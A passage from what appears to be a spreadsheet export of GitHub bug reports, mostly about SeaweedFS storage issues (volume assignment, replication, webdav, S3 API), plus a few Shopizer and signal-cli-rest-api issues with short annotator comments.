\"http://seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444/5122,1740bcaa7be3be\": dial tcp 10.161.3.122:8444: connect: connection refused"}  So, on a first sight it looks quite obvious, we shutdown one of Volume Servers, and Filer cannot write to it (we see `connection refused`). The question is: **_why_** Master assigns volumes for write, if they should be unwritable? Deeper investigation into the issue showed that it could be some issue of synchronization between threads on Master's side. This is a piece of SeaweedFS Volume Server log which was shutdown:  I0511 13:40:18.303550 signal_handling.go:48 exec interrupt hook func name:github.com/seaweedfs/seaweedfs/weed/command.VolumeServerOptions.startVolumeServer.func1 I0511 13:40:18.303585 volume_server.go:139 Stopping volume server volume server has been killed I0511 13:40:18.303671 volume_grpc_client_to_master.go:258 volume server seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 stops and deletes all volumes I0511 13:40:19.587873 volume.go:280 stop send heartbeat and wait 10 seconds until shutdown  I0511 13:40:19.587922 store.go:166 In dir /data0 adds volume:16498 collection:test replicaPlacement:001 ttl: I0511 13:40:19.587969 volume_info.go:20 maybeLoadVolumeInfo checks /data0/test_16498.vif I0511 13:40:19.588117 volume_loading.go:121 open to write file /data0/test_16498.idx I0511 13:40:19.588154 volume_loading.go:142 loading memory index /data0/test_16498.idx to memory I0511 13:40:19.588208 needle_map_memory.go:54 max file key: 0 for file: /data0/test_16498.idx I0511 13:40:19.588721 store_replicate.go:35 replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:19.588734 common.go:113 error JSON response status 500: replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:19.588750 common.go:70 response method:POST URL:/16496,4f3ade2d2f7065 with httpStatus:500 and JSON:{"error":"replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:19.606846 common.go:106 error writing JSON status /status 200: write tcp 10.183.0.38:8444-&gt;10.183.0.1:46920: write: connection reset by peer I0511 13:40:19.606865 common.go:107 JSON content: map[DiskStatuses:[dir:"/data0" all:98953909501952 used:9914417262592 free:89039492239360 percent_free:89.980774 percent_used:10.019227] &lt;omitted&gt; I0511 13:40:19.731598 disk_location.go:440 dir /data0 disk free 89.98% &gt;= required 1.00% I0511 13:40:19.916394 store.go:170 add volume 16498 I0511 13:40:19.916412 volume_grpc_admin.go:60 assign volume volume_id:16498 collection:"test" replication:"001" I0511 13:40:20.074794 store_replicate.go:35 replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:20.074812 common.go:113 error JSON response status 500: replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:20.074826 common.go:70 response method:POST URL:/16496,4f3ade2d2f7065 with httpStatus:500 and JSON:{"error":"replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:20.798244 store_replicate.go:35 replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:20.798261 common.go:113 error JSON response status 500: replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:20.798275 common.go:70 response method:POST URL:/16496,4f3ade2d2f7065 with httpStatus:500 and JSON:{"error":"replicating operations [1] is less than volume 16496 replication copy count [2] I0511 13:40:29.588357 volume.go:304 graceful stop cluster http server  I0511 13:40:29.588947 volume.go:309 graceful stop gRPC  I0511 13:40:29.589452 volume_server.go:149 Shutting down volume server I0511 13:40:29.695784 volume_server.go:151 Shut down successfully!  Point to take a look is assignment of new volume (id=16498) on this Volume Server after its termination. And piece of log from Master:  I0511 13:40:18.304201 master_grpc_server.go:162 master received heartbeat ip:"seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test" port:8444 public_url:"seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444" has_no_volumes:true I0511 13:40:18.446855 cluster_commands.go:32 max volume id 16497 ==&gt; 16498 I0511 13:40:18.464245 volume_growth.go:244 Created Volume 16498 on topo:DefaultDataCenter:DefaultRack:seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 I0511 13:40:18.464308 master_grpc_server.go:162 master received heartbeat ip:"seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test" port:8444 new_volumes:{id:16498 collection:"test" replica_placement:1 version:3} I0511 13:40:18.464338 volume_layout.go:223 volume 16498 does not have enough copies I0511 13:40:18.464344 volume_layout.go:228 volume 16498 remove from writable I0511 13:40:18.464453 masterclient.go:277 .master: seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 masterClient adds volume 16498 I0511 13:40:18.464460 vid_map.go:160 + volume id 16498: {Url:seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 PublicUrl:seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 DataCenter:DefaultDataCenter GrpcPort:0} W0511 13:40:18.469625 master_grpc_server.go:100 SendHeartbeat.Recv server seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 : rpc error: code = Canceled desc = context canceled I0511 13:40:18.469648 node.go:237 topo:DefaultDataCenter:DefaultRack removes seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 I0511 13:40:18.469655 master_grpc_server.go:87 unregister disconnected volume server seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 I0511 13:40:18.469659 master_grpc_server.go:58 remove volume server seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444, online volume server: map[seaweedfs-test-volume-0.seaweedfs-test-volume-peer.seaweedfs-test:8444:[b81f6a9c-e4c1-4702-88d5-51974f4ca3d6] seaweedfs-test-volume-1.seaweedfs-test-volume-peer.seaweedfs-test:8444:[58a7e74e-84e2-48df-b52b-dc9555afb548] seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444:[ff43c257-c736-4b6b-a930-db16c409c12b]] I0511 13:40:18.527309 masterclient.go:292 updateVidMap(DefaultDataCenter) .master: seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 volume add: 0, del: 8263, add ec: 0 del ec: 0 I0511 13:40:19.771416 master_grpc_server.go:162 master received heartbeat ip:"seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test" port:8444 public_url:"seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444" max_file_key:5192448 volumes:{id:10324 size:1128282400 &lt;omitted&gt; I0511 13:40:19.916729 volume_growth.go:244 Created Volume 16498 on seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 I0511 13:40:19.916752 volume_layout.go:223 volume 16498 does not have enough copies I0511 13:40:19.916756 volume_layout.go:228 volume 16498 remove from writable I0511 13:40:19.916761 volume_growth.go:257 Registered Volume 16498 on topo:DefaultDataCenter:DefaultRack:seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 I0511 13:40:19.916771 volume_layout.go:393 Volume 16498 becomes writable I0511 13:40:19.916776 volume_growth.go:257 Registered Volume 16498 on seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 I0511 13:40:19.919012 cluster_commands.go:32 max volume id 16498 ==&gt; 16499 I0511 13:40:19.957609 masterclient.go:277 .master: seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 masterClient adds volume 16498 I0511 13:40:19.957611 vid_map.go:160 + volume id 16498: {Url:seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 PublicUrl:seaweedfs-test-volume-2.seaweedfs-test-volume-peer.seaweedfs-test:8444 DataCenter:DefaultDataCenter GrpcPort:0} I0511 13:40:19.957620 masterclient.go:277 .master: seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 masterClient adds volume 16498 I0511 13:40:19.957622 vid_map.go:160 + volume id 16498: {Url:seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 PublicUrl:seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 DataCenter: GrpcPort:0} I0511 13:40:19.957626 masterclient.go:292 updateVidMap() .master: seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 volume add: 1, del: 0, add ec: 0 del ec: 0  There also were a lot of messages like these:  I0511 13:40:18.329755 topology.go:252 removing volume info: Id:2458, Size:1329612128, ReplicaPlacement:001, Collection:test, Version:3, FileCount:317, DeleteCount:0, DeletedByteCount:0, ReadOnly:false from seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444 I0511 13:40:18.431844 master_grpc_server.go:203 master see deleted volume 2458 from seaweedfs-test-volume-3.seaweedfs-test-volume-peer.seaweedfs-test:8444  But there is no such message for Volume 16498, so it is writeable from Master's perspective (but in fact it doesn't), and Filer gets assignments for write requests on this volume. **System Setup** We have SeaweedFS running on Kubernetes via SeaweedFS Operator. There are 3 Masters, 4 Volume Servers, 4 Filers (with Scylla as its backend) - List the command line to start "weed master", "weed volume", "weed filer", "weed s3", "weed mount": - Master:  weed -v 4 -logtostderr=true master -volumeSizeLimitMB=1024 -defaultReplication=001 -ip=$(POD_NAME).seaweedfs-test-master-peer.seaweedfs-test -peers=seaweedfs-test-master-0.seaweedfs-test-master-peer.seaweedfs-test:9333,seaweedfs-test-master-1.seaweedfs-test-master-peer.seaweedfs-test:9333,seaweedfs-test-master-2.seaweedfs-test-master-peer.seaweedfs-test:9333 -metricsPort=9999  - Volume Server:  weed -v 4 -logtostderr=true volume -port=8444 -max=0 -ip=$(POD_NAME).seaweedfs-test-volume-peer.seaweedfs-test -metricsPort=9999 -mserver=seaweedfs-test-master-0.seaweedfs-test-master-peer.seaweedfs-test:9333,seaweedfs-test-master-1.seaweedfs-test-master-peer.seaweedfs-test:9333,seaweedfs-test-master-2.seaweedfs-test-master-peer.seaweedfs-test:9333 -dir=/data0  - Filer:  weed -v 4 -logtostderr=true filer -port=8888 -ip=$(POD_NAME).seaweedfs-test-filer-peer.seaweedfs-test -master=seaweedfs-test-master-0.seaweedfs-test-master-peer.seaweedfs-test:9333,seaweedfs-test-master-1.seaweedfs-test-master-peer.seaweedfs-test:9333,seaweedfs-test-master-2.seaweedfs-test-master-peer.seaweedfs-test:9333 -metricsPort=9999 -s3  - OS version: Fedora CoreOS 33.20210426.3.0 - output of `weed version`: `version 8000GB 3.43 673214574 linux amd64` - if using filer, show the content of `filer.toml`:  [leveldb2] enabled = false [etcd] enabled = false servers = "seaweed-etcd.seaweedfs-test:2379" timeout = "3s" [cassandra] enabled = true keyspace="seaweedfs" hosts=[ "seaweed-scylla-client.seaweedfs-test:9042", ] superLargeDirectories = [ ]  **Expected behavior** We expect unwritable (de facto) volumes will not be assigned for write requests.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/4934</t>
  </si>
  <si>
    <t>volume.configure.replication seems to not work</t>
  </si>
  <si>
    <t>**Describe the bug** When using volume.configure.replication, the actual volume files still retain their old configuration. **Test case** Start a weed master (defaultReplication=020) and 3 volume servers:  weed master -defaultReplication=020 weed volume -port=8081 -dir=/tmp/volume1 -max=100 -mserver="127.0.0.1:9333" -dataCenter=dc1 -rack=rack1 weed volume -port=8082 -dir=/tmp/volume2 -max=100 -mserver="127.0.0.1:9333" -dataCenter=dc1 -rack=rack2 weed volume -port=8083 -dir=/tmp/volume3 -max=100 -mserver="127.0.0.1:9333" -dataCenter=dc1 -rack=rack3  Create some volumes:  curl http://localhost:9333/dir/assign  It should look like this: ![Screenshot from 2023-10-23 16-49-42](https://github.com/seaweedfs/seaweedfs/assets/7746192/e9eea85c-6f77-4d12-9b48-740d0cd94c59) Now, let's change the replication settings using weed shell:  weed shell volume.configure.replication -collectionPattern * -replication 010  The volume servers correctly show the change in the logs:  I1023 14:52:01.272205 disk_location.go:182 data file /tmp/volume2/1.dat, replication=010 v=3 size=8 ttl=  The API also thinks, it is changed:  $ curl http://localhost:9333/vol/status?pretty=y|grep "ReplicaPlacement" -A 2 "ReplicaPlacement": { "rack": 1 },  But when we look at the .dat files using `change_superblock.go`, we see that it is still 020:  $ go run change_superblock.go -volumeId=1 -dir=/tmp/volume1 Current Volume Replication: 020 Current Volume TTL:  Just to make sure, we run some tests. First, we fix the replication:  $ weed shell lock volume.fix.replication &gt; volume 2 replication 010, but over replicated +3 &gt; volume 3 replication 010, but over replicated +3 &gt; volume 1 replication 010, but over replicated +3 &gt; deleting volume 2 from 10.23.1.43:8083  &gt; deleting volume 3 from 10.23.1.43:8083  &gt; deleting volume 1 from 10.23.1.43:8083   Looks good. We now have 2 copies of every volume file: ![Screenshot from 2023-10-23 16-58-31](https://github.com/seaweedfs/seaweedfs/assets/7746192/58ec1a28-2cde-4d3d-a590-127338fcd9ca) If we delete one and fix replication again, it should add it back.  weed shell lock volume.delete -node 10.23.1.43:8081 -volumeId 1 volume.fix.replication &gt; the number of locations for volume 1 has not increased yet, let's wait &gt; the number of locations for volume 1 has not increased yet, let's wait &gt; the number of locations for volume 1 has not increased yet, let's wait &gt; the number of locations for volume 1 has not increased yet, let's wait &gt; the number of locations for volume 1 has not increased yet, let's wait &gt; error: replicas volume 1 mismatch in topology  It did restore the missing copy but showed the error `error: replicas volume 1 mismatch in topology`. The volume server log shows that it added the volume with replication 020:  I1023 15:03:29.264620 disk_location.go:182 data file /tmp/volume3/1.dat, replication=020 v=3 size=8 ttl=  If we query the API, it now also shows replication 020 for the restored copy:  curl http://localhost:9333/vol/status?pretty=y|grep "ReplicaPlacement" -A 2 "ReplicaPlacement": { "rack": 1 }, "ReplicaPlacement": { "rack": 2 },  **System Setup** - Ubuntu 22.04 - output of `weed version`: version 30GB 3.57 0f8168c0c928bba3d2f48b0680d3bdce9c617559 linux amd64 **Expected behavior** `volume.configure.replication` changes the replication setting in the volume files.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/4967</t>
  </si>
  <si>
    <t>webdav bug creates directories in wrong folder</t>
  </si>
  <si>
    <t>**Describe the bug** When using `weed webdav -filer.path` for a non `/` path, folders get created on the `/` of the filer instance the `weed webdav` is connected to **System Setup** weed 3.58 on seaweedfs docker container, arguments used for webdav:  -logtostderr webdav -collection=arman -replication=010 -port=${NOMAD_PORT_webdav} -filer=seaweedfs-filer-http.nomad:8888.18888 -filer.path=/buckets/arman -cacheDir=/alloc/data/ -cacheCapacityMB=1024  on seaweedfs docker container, arguments used for filer:  -logtostderr filer -ip=${NOMAD_IP_http} -ip.bind=0.0.0.0 -master=seaweedfs-master-http.nomad:${var.master_port_http}.${var.master_port_grpc} -port=${NOMAD_PORT_http} -port.grpc=${NOMAD_PORT_grpc} -metricsPort=${NOMAD_PORT_metrics} -webdav -webdav.collection= -webdav.replication=020 -webdav.port=${NOMAD_PORT_webdav}  (so as you can see I am running a normal webdav instance with filer, and I am trying to set up a new one on a different container that points to a different path) **Expected behavior** When creating a folder in `weed webdav -filer.path=/buckets/arman` directory gets created under `/buckets/arman` in filer (for the example above). **Actual Behaviour** It gets created under the top-level `/` instead</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/5155</t>
  </si>
  <si>
    <t>s3api v3.60: Missing VersionConfiguration node in get-bucket-versioning response</t>
  </si>
  <si>
    <t xml:space="preserve">Feature introduced in: https://github.com/seaweedfs/seaweedfs/pull/4998 **Describe the bug** When using aws-cli get-bucket-versioning will return no results; this is due to the malformed response. When running with debug, we can see that the response body is missing the VersionConfiguration node.  aws --endpoint-url http://localhost:8333 s3api get-bucket-versioning --bucket mybucket --debug  2024-01-03 01:11:43,611 - MainThread - urllib3.connectionpool - DEBUG - Starting new HTTP connection (1): localhost:8333 2024-01-03 01:11:43,618 - MainThread - urllib3.connectionpool - DEBUG - http://localhost:8333 "GET /mybucket?versioning HTTP/1.1" 200 26 2024-01-03 01:11:43,619 - MainThread - botocore.parsers - DEBUG - Response headers: {'Accept-Ranges': 'bytes', 'Content-Length': '26', 'Content-Type': 'application/xml', 'Server': 'SeaweedFS S3', 'X-Amz-Request-Id': '1704244303617654225' , 'Date': 'Wed, 03 Jan 2024 01:11:43 GMT'} 2024-01-03 01:11:43,619 - MainThread - botocore.parsers - DEBUG - Response body: b'&lt;Status&gt;Suspended&lt;/Status&gt;'   **System Setup** - running seaweedfs:3.60_large_disk container image - command: weed server -s3 -iam - `# weed version: version 8000GB 3.60 d4e91b6ad linux amd64` **Expected behavior** Default response **"Status":"Suspended"**:  aws --endpoint-url http://localhost:8333 s3api get-bucket-versioning --bucket mybucket { "Status": "Suspended" } </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/5213</t>
  </si>
  <si>
    <t>Master timeouts during dirAssign volume growth</t>
  </si>
  <si>
    <t>**Describe the bug** Timeouts when requesting a /dir/assign at the master(s). **System Setup** - master(s) 3 of them, but I get the same issues when I only start one: - `/usr/local/bin/weed -v=3 -logdir=/var/log/seaweedfs master -mdir=/etc/seaweedfs -ip=10.0.9.15 -port=9333 -metrics.address=10.0.9.17:9091 -defaultReplication=010 -volumePreallocate -garbageThreshold=0.3 -volumeSizeLimitMB=20000 -peers=10.0.9.17:9333,10.0.9.14:9333,10.0.9.15:9333` - volume(s) 7 of them, I use different IP's, racks, and volumes. - `/usr/local/bin/weed -v=3 -logdir=/var/log/seaweedfs volume -index=leveldb -mserver=10.0.9.17:9333,10.0.9.14:9333,10.0.9.15:9333 -dir=/volumes/98fb3388c280,/volumes/LHHGS,/volumes/e000c055cbe4,/volumes/c5a9aff45527,/volumes/619c9a0827f4,/volumes/f8c44345756f,/volumes/eeedca023938,/volumes/cae089cd2dd9,/volumes/20F30GRVRD,/volumes/KWEGS,/volumes/3d5638f4fd34,/volumes/18f39b04390d,/volumes/6a9e8c97ba2a,/volumes/LDTGS,/volumes/a9a6e2d048de,/volumes/20F308T27D,/volumes/19641ea6d6c5,/volumes/20F30JB3JE,/volumes/6e19dd8da77b,/volumes/3d1614841bcc,/volumes/372cb7e5ac18,/volumes/152d865d39ce,/volumes/20F305249D,/volumes/1289675b7f03,/volumes/222079443d03,/volumes/cc66d284719d,/volumes/ca6f98cd3c16,/volumes/6611045c7cf2,/volumes/381ee044d930,/volumes/ff81968af32c,/volumes/9d611128cfed,/volumes/21F306AD4F,/volumes/595892cb8709,/volumes/0553ccb52b90 -max=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 -concurrentDownloadLimitMB=20000 -concurrentUploadLimitMB=20000 -hasSlowRead=true -readBufferSizeMB=8 -compactionMBps=10 -rack=store02 -ip=10.0.9.2` - - OS version - `Debian GNU/Linux 12 (bookworm) / Linux store02 6.1.0-17-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.69-1 (2023-12-30) x86_64 GNU/Linux` - output of `weed version` - version `30GB 3.62 59b8af99b0aca1b9e88fec7b5f27c7d15e5e8604 linux amd64` - no filer only masters &amp; volume servers, we have an own metadata store. **Expected behavior** When we assign/request multiple keys or a single key at the Leader master, we don't expect timeouts. Normally we get an instant response. But sometimes (every x minutes) we get a timeout on the a request like: http://10.0.9.17:9333/dir/assign?collection=nntp&amp;count=10000&amp;replication=001. Also when we lower the count. We sadly don't get an error at this request, but I noticed when this happens I see the following log entry: ` seaweedfs-master[459769]: I0116 14:50:10.468052 master_server_handlers.go:125 dirAssign volume growth {"collection":"nntp","replication":{"node":1},"ttl":{"Count":0,"Unit":0}} from 10.0.9.12:40308` It looks that this always happens when there is a dirAssign volume growth. In parallel there are constantly POST requests directly to the volume servers to store data. I thought a work-around was to use replication 010 or 002, but working only for a while. We just started testing SeaweedFS and started with 3.60, but also after the upgrades to 3.62 we still see this issue. ( I didn't tested older versions ) **Additional context** How I test/reproduce it: `while true; do curl --max-time 3 'http://localhost:9333/dir/assign?collection=nntp&amp;replication=001'; echo "" ; done` I get once in a couple of seconds/minutes a timeout (also when I increase the max-time): `curl: (28) Operation timed out after 3000 milliseconds with 0 bytes received` at that moment I see always a volume growth message in the logging: `seaweedfs-master[459769]: I0116 14:50:10.468052 master_server_handlers.go:125 dirAssign volume growth {"collection":"nntp","replication":{"node":1},"ttl":{"Count":0,"Unit":0}} from 10.0.9.12:40308` **Screen shot** ![b13912075ec83a54736ed1da4a98b5fcbe](https://github.com/seaweedfs/seaweedfs/assets/11386125/f6dec3c3-c6ae-40cf-a018-3e27fb7f4760) &lt;img width="1770" alt="Screenshot 2024-01-17 at 23 09 24" src="https://github.com/seaweedfs/seaweedfs/assets/11386125/e142a531-b314-442e-938e-c49925f41007"&gt;</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/5774</t>
  </si>
  <si>
    <t>remote sync unexpected behavior</t>
  </si>
  <si>
    <t>Not mounted directory has same prefix as mounted directory pushed to remote storage when running filer.remote.sync. for example, there is two dir, /foo and /foo-bar, only /foo mounted to remote storage remote:/foo, when running: `weed filer.remote.sync -dir=/foo` files in /foo-bar, for example /foo-bar/baz/qux was pushed to remote:/foo/-bar/baz/qux</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/5864</t>
  </si>
  <si>
    <t>[webdav] When the webdav service stops, a 404 is returned for an existing file</t>
  </si>
  <si>
    <t xml:space="preserve">**Describe the bug** When the webdav service stops, a 404 is returned for an existing file **System Setup** `3.71` **Expected behavior** Returning always 200 or return nothing **Additional context**  1. make server with -webdav option 2. while true; do curl -sI "http://127.0.0.1:7333/buckets/warp-benchmark-bucket/xyla1SAS/99.dIWkjopAvnLG(3VR.rnd" | grep HTTP; done 3. Crtl+C stop server 4. Got HTTP/1.1 200 OK HTTP/1.1 404 Not Found  logs:  I0806 14:38:20.436016 filer_grpc_server.go:31 LookupDirectoryEntry /buckets/warp-benchmark-bucket/xyla1SAS/99.dIWkjopAvnLG(3VR.rnd: get /buckets/warp-benchmark-bucket/xyla1SAS/99.dIWkjopAvnLG(3VR.rnd : leveldb: closed, I0806 14:38:20.436090 filer_pb_helper.go:139 read /buckets/warp-benchmark-bucket/xyla1SAS/99.dIWkjopAvnLG(3VR.rnd: rpc error: code = Unknown desc = get /buckets/warp-benchmark-bucket/xyla1SAS/99.dIWkjopAvnLG(3VR.rnd : leveldb: closed I0806 14:38:20.436096 filer_client.go:42 read /buckets/warp-benchmark-bucket/xyla1SAS/99.dIWkjopAvnLG(3VR.rnd &lt;nil&gt;: LookupEntry1: rpc error: code = Unknown desc = get /buckets/warp-benchmark-bucket/xyla1SAS/99.dIWkjopAvnLG(3VR.rnd : leveldb: closed </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/6262</t>
  </si>
  <si>
    <t>Multipart upload without S3 authentication fails with the wrong message</t>
  </si>
  <si>
    <t>**Describe the bug** If S3 authentication is not setup, attempting to upload multipart will fail with the error message: Expected hash not equal to calculated hash While trying to make a minimal reproduction of this behavior to report the bug, I noticed that when using the amazon SDK `TransferUtility`, I get a different error message: Signed request requires setting up SeaweedFS S3 authentication This led me to find the otherwise completely opaque issue at hand. **System Setup** `podman run --name seaweed-12312 --rm -p 12312:12312 docker.io/chrislusf/seaweedfs server -s3 -s3.port 12312` To run seaweed. Then in C#: cs var s3Client = new AmazonS3Client( new AmazonS3Config { ServiceURL = "http://localhost:12312", ForcePathStyle = true, } ); var bucketName = "my-test-bucket"; var keyName = "dir/file.txt"; var fakeFileData = new StringBuilder(); fakeFileData.AppendLine("a,b,c,d,e"); for (var i = 0; i &lt; 10000; i++) { fakeFileData.AppendLine($"a{i},b{i},c{i},d{i},e{i}"); } var cancellationToken = CancellationToken.None; var initiateRequest = new InitiateMultipartUploadRequest { BucketName = bucketName, Key = keyName, }; var initiateResponse = await s3Client.InitiateMultipartUploadAsync(initiateRequest, cancellationToken); var partETags = new List&lt;PartETag&gt;(); using (var fakeFileStream = new MemoryStream(Encoding.UTF8.GetBytes(fakeFileData.ToString( { var uploadRequest = new UploadPartRequest { BucketName = bucketName, Key = keyName, UploadId = initiateResponse.UploadId, PartNumber = 1, PartSize = fakeFileStream.Length, InputStream = fakeFileStream }; var uploadResponse = await s3Client.UploadPartAsync(uploadRequest, cancellationToken); partETags.Add(new PartETag(uploadResponse.PartNumber, uploadResponse.ETag)); } var completeRequest = new CompleteMultipartUploadRequest { BucketName = bucketName, Key = keyName, UploadId = initiateResponse.UploadId, PartETags = partETags }; await s3Client.CompleteMultipartUploadAsync(completeRequest, cancellationToken);  The above fails with `Expected hash not equal to calculated hash`. However, running the code below: cs var s3Client = new AmazonS3Client( new AmazonS3Config { ServiceURL = "http://localhost:12312", ForcePathStyle = true, } ); var bucketName = "my-test-bucket"; var keyName = "dir/file.txt"; var fakeFileData = new StringBuilder(); fakeFileData.AppendLine("a,b,c,d,e"); for (var i = 0; i &lt; 10000; i++) { fakeFileData.AppendLine($"a{i},b{i},c{i},d{i},e{i}"); } var fileTransferUtility = new TransferUtility(s3Client); using (var fakeFileStream = new MemoryStream(Encoding.UTF8.GetBytes(fakeFileData.ToString( { var fileTransferUtilityRequest = new TransferUtilityUploadRequest { BucketName = bucketName, InputStream = fakeFileStream, PartSize = 6*1024*1024, // 6 MB. Key = keyName, // DisablePayloadSigning = true, }; await fileTransferUtility.UploadAsync(fileTransferUtilityRequest); }  This fails with the much more useful `Signed request requires setting up SeaweedFS S3 authentication`. It's important to note, that if I setup seaweed using: `podman run --name seaweed-12312 -v /home/$USER/s3_config.json:/app/:Z --rm -p 12312:12312 docker.io/chrislusf/seaweedfs server -s3 -s3.port 12312 -s3.config "/app/s3_config.json"` While filling `~/s3_config.json` with:  { "identities": [ { "name": "me", "credentials": [ { "accessKey": "seaweed", "secretKey": "seaweed" } ], "actions": [ "Read", "Write", "List", "Tagging", "Admin" ] } ] }  And then setting up the client accordingly: cs var s3Client = new AmazonS3Client( new BasicAWSCredentials("seaweed", "seaweed"), new AmazonS3Config { ServiceURL = "http://localhost:12312", ForcePathStyle = true, } );  Both examples work. **Expected behavior** I'd like for the simple case to fail with an informative error message, instead of giving a hash equality message which implies some usage bug. I'm glad I could find the issue eventually, but I could've saved a lot of time with the right error message!</t>
  </si>
  <si>
    <t xml:space="preserve">it gives incorrect/ message as response </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/6379</t>
  </si>
  <si>
    <t>S3 DeleteMultipleObjectsHandler does not honour AllowEmptyFolder setting</t>
  </si>
  <si>
    <t>Sponsors SeaweedFS via Patreon https://www.patreon.com/seaweedfs **Describe the bug** When running the S3 DeleteMultipleObjectsHandler function, the setting "AllowEmptyFolder" is not honoured. In circumstances where the filer folders are mistakenly identified as being empty, this causes the entire bucket contents to be deleted. **System Setup** - We setup an integrated Filer + S3 handler, using "leveldb2" driver - Photon Linux 5 - Weed version 3.79 **Expected behavior** When AllowEmptyFolder setting is set to true, only the items specified in the DeleteMultipleObjectsHandler call should have been deleted. **Additional context** The environment on which this runs is suspected to have very slow disk access, which we believe to be the cause for the folders being identified as empty.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/6497</t>
  </si>
  <si>
    <t>Using PUT object with bucket of invalid name leads to unremovable bucket</t>
  </si>
  <si>
    <t xml:space="preserve"> root@Hepatitis:~# s3cmd put ab s3://aa/a upload: 'ab' -&gt; 's3://aa/a' [1 of 1] 0 of 0 0% in 0s 0.00 B/s done WARNING: Upload failed: /a (500 (InternalError): We encountered an internal error, please try again.) WARNING: Waiting 3 sec upload: 'ab' -&gt; 's3://aa/a' [1 of 1] 0 of 0 0% in 0s 0.00 B/s done WARNING: Upload failed: /a (500 (InternalError): We encountered an internal error, please try again.) WARNING: Waiting 6 sec ^CSee ya! root@Hepatitis:~# s3cmd put ab s3://aa  The created aa bucket can then not be removed even via ``weed shell`` due to the invalid bucket name of ``aa``</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/6576</t>
  </si>
  <si>
    <t>Seaweed does not handle x-id</t>
  </si>
  <si>
    <t>AWS SDK's emit an x-id query parameter which is not supported by seaweed leading to issues handling presigned requests</t>
  </si>
  <si>
    <t>https://github.com/shopizer-ecommerce/shopizer/issues/1</t>
  </si>
  <si>
    <t>Generate invoice does not download the generated PDF V2.0ALPHA</t>
  </si>
  <si>
    <t>Go to invoice details, click on generate invoice, wrong mim type</t>
  </si>
  <si>
    <t xml:space="preserve">not sure , becase not metion of api's use </t>
  </si>
  <si>
    <t>https://github.com/shopizer-ecommerce/shopizer/issues/3</t>
  </si>
  <si>
    <t>Customers are not filtered in the admin tool</t>
  </si>
  <si>
    <t>Log in the admin, left menu choose customers, try to filter by name or email, returns an empty list</t>
  </si>
  <si>
    <t>https://github.com/shopizer-ecommerce/shopizer/issues/355</t>
  </si>
  <si>
    <t>Can add a negative number of quantities produce in shopping cart</t>
  </si>
  <si>
    <t>Number of added products in the cart should be positive Steps to reproduce: 1. Open single product preview page 2. Add product to the cart 3. Open shopping cart then you will see that quantities field can use a negative numbers</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/1</t>
  </si>
  <si>
    <t>cyrillic symbols dosn't support?</t>
  </si>
  <si>
    <t>Thanks for your solution integration signal to HA. Everything works fine (but slow) except for the Cyrillic alphabet. ![photo_2020-01-16_12-02-27](https://user-images.githubusercontent.com/50143425/72509283-53a7ba00-3858-11ea-9b3b-9019fe87f5c7.jpg)</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/19</t>
  </si>
  <si>
    <t>error Captcha required for verification</t>
  </si>
  <si>
    <t>Hi ! When I run the CURL post to verify phone number : `curl -X POST -H "Content-Type: application/json" 'http://192.168.255.1:8080/v1/register/+336xxxxxxxx'` I get : `{"error":"Captcha required for verification (null)\n"}` any idea ?</t>
  </si>
  <si>
